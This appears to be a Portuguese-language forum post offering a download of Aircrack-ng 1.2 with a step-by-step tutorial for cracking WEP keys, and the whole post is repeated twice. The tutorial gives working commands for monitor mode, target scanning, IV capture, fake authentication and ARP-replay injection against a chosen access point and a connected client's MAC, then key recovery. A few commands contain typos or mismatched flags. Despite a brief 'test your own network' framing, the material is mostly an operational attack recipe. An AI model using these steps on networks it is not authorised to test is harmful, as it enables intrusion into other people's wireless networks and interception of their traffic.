ja nao sei o que dizer ca vai mais este para hoje(http://imagenes.es.sftcdn.net/es/scrn/67000/67245/aircrack-ng-01-700x340.jpg)AIRCRACK-NG 1.2
Aircrack-ng é um programa para quebrar chaves WEP e WPA/WPA2-PSK do IEEE 802.11.
Aircrack-ng pode recuperar a chave WEP, uma vez que um número suficiente de pacotes criptografados sejam capturados com o airodump-ng. Esta parte do pacote Aircrack-ng determina a chave WEP usando dois métodos fundamentais. O primeiro método é por abordagem PTW (Pyshkin, Tews, Weinmann). A principal vantagem da abordagem PTW é que pouquíssimos pacotes de dados são necessários para quebrar a chave WEP. O segundo método é o método FMS/KoreK. O método FMS/KoreK incorpora vários ataques estatísticos para descobrir a chave WEP e usa esses ataques em combinação com força-bruta.
Adicionalmente, o programa oferece um método de dicionário para determinar a chave WEP. Para quebrar chaves pré-compartilhadas WPA/WPA2, somente o método de dicionário é utilizado.
A quantas anda a segurança na sua rede de internet sem fio? Qual a dificuldade que os piratas da vizinhança teriam para descobrir a senha ou sabotar o sistema? Há espiões nas conversas ou interceptando dados durante a transmissão?
Se alguma dessas perguntas passar pela cabeça, encontre respostas com o Aircrack-ng. O Aircrack-ng é grátis e capaz de descodificar senhas feitas a partir de codificação WEP e WPA-PSK.
Piratas sem fio
Você usa o Aircrack-ng para fazer um ataque à sua própria rede. Só assim você vai saber quanto tempo seria necessário para descobrir a senha. A solução estaria em ampliar a proteção da chave WPA como limitar o acesso por MAC e desativar o serviço DHCP.
O uso do Aircrack-ng vai te ajudar a simular uma situação de perigo real. Este programa é um dos mais eficientes para interceptar e registrar o tráfego de dados em redes de computadores. Se passar no teste do Aircrack-ng, a sua rede está com bons índices de segurança.(https://insanemindsclan.files.wordpress.com/2012/05/baixar-aqui.png?w=538)
TUTORIAL
VAMOS LÁ:
Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:
airmon-ng start wlan0 ? “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.
Agora iremos escanear todas as redes disponíveis;
Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela1.png)
Nesse passo iremos capturar os vetores de inicialização:
Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.
airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0
-i = Capturar apenas pacotes que contenham Ivs (–ivs);
-w = Prefixo do arquivo que será gerado com os dados capturados;
-c = Canal;
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela2.png)
Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:
aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0
-1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
0 = Aqui temos o tempo para reassociação, em segundos
-e = ESSID do alvo, ou seja, o nome do access point
-a = Mac-Address do Access Point alvo
-h = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela3.png)
Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:
Enviando Arp request para a rede:
aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0
-3 = Opção para arp request;
-b = Mac-Address do Access Point alvo
-h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela4.png)
Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.
Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.
aircrack-ng -a 1 capturar-ivs-redesegura
-a = Modo para forçar o ataque
-1 = wep (se fosse WPA usaríamos o -2)(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela5.png)
Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.
Feito isso a senha cai no nosso colo, veja a tela abaixo:(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela6.png)(https://insanemindsclan.files.wordpress.com/2012/05/baixar-aqui.png?w=538)
(http://imagenes.es.sftcdn.net/es/scrn/67000/67245/aircrack-ng-01-700x340.jpg)AIRCRACK-NG 1.2CA CA VA VA FICHE ESTE JA ERA SEM TEMPO
Aircrack-ng é um programa para quebrar chaves WEP e WPA/WPA2-PSK do IEEE 802.11.
Aircrack-ng pode recuperar a chave WEP, uma vez que um número suficiente de pacotes criptografados sejam capturados com o airodump-ng. Esta parte do pacote Aircrack-ng determina a chave WEP usando dois métodos fundamentais. O primeiro método é por abordagem PTW (Pyshkin, Tews, Weinmann). A principal vantagem da abordagem PTW é que pouquíssimos pacotes de dados são necessários para quebrar a chave WEP. O segundo método é o método FMS/KoreK. O método FMS/KoreK incorpora vários ataques estatísticos para descobrir a chave WEP e usa esses ataques em combinação com força-bruta.
Adicionalmente, o programa oferece um método de dicionário para determinar a chave WEP. Para quebrar chaves pré-compartilhadas WPA/WPA2, somente o método de dicionário é utilizado.
A quantas anda a segurança na sua rede de internet sem fio? Qual a dificuldade que os piratas da vizinhança teriam para descobrir a senha ou sabotar o sistema? Há espiões nas conversas ou interceptando dados durante a transmissão?
Se alguma dessas perguntas passar pela cabeça, encontre respostas com o Aircrack-ng. O Aircrack-ng é grátis e capaz de descodificar senhas feitas a partir de codificação WEP e WPA-PSK.
Piratas sem fio
Você usa o Aircrack-ng para fazer um ataque à sua própria rede. Só assim você vai saber quanto tempo seria necessário para descobrir a senha. A solução estaria em ampliar a proteção da chave WPA como limitar o acesso por MAC e desativar o serviço DHCP.
O uso do Aircrack-ng vai te ajudar a simular uma situação de perigo real. Este programa é um dos mais eficientes para interceptar e registrar o tráfego de dados em redes de computadores. Se passar no teste do Aircrack-ng, a sua rede está com bons índices de segurança.(https://insanemindsclan.files.wordpress.com/2012/05/baixar-aqui.png?w=538)
TUTORIAL
VAMOS LÁ:
Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:
airmon-ng start wlan0 ? “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.
Agora iremos escanear todas as redes disponíveis;
Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela1.png)
Nesse passo iremos capturar os vetores de inicialização:
Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.
airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0
-i = Capturar apenas pacotes que contenham Ivs (–ivs);
-w = Prefixo do arquivo que será gerado com os dados capturados;
-c = Canal;
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela2.png)
Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:
aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0
-1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
0 = Aqui temos o tempo para reassociação, em segundos
-e = ESSID do alvo, ou seja, o nome do access point
-a = Mac-Address do Access Point alvo
-h = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela3.png)
Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:
Enviando Arp request para a rede:
aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0
-3 = Opção para arp request;
-b = Mac-Address do Access Point alvo
-h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
mon0 = interface de rede em modo promiscuo.(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela4.png)
Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.
Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.
aircrack-ng -a 1 capturar-ivs-redesegura
-a = Modo para forçar o ataque
-1 = wep (se fosse WPA usaríamos o -2)(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela5.png)
Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.
Feito isso a senha cai no nosso colo, veja a tela abaixo:(http://www.trainingtecnologia.com.br/images/blog/2011/tutoriais/tela6.png)(https://insanemindsclan.files.wordpress.com/2012/05/baixar-aqui.png?w=538)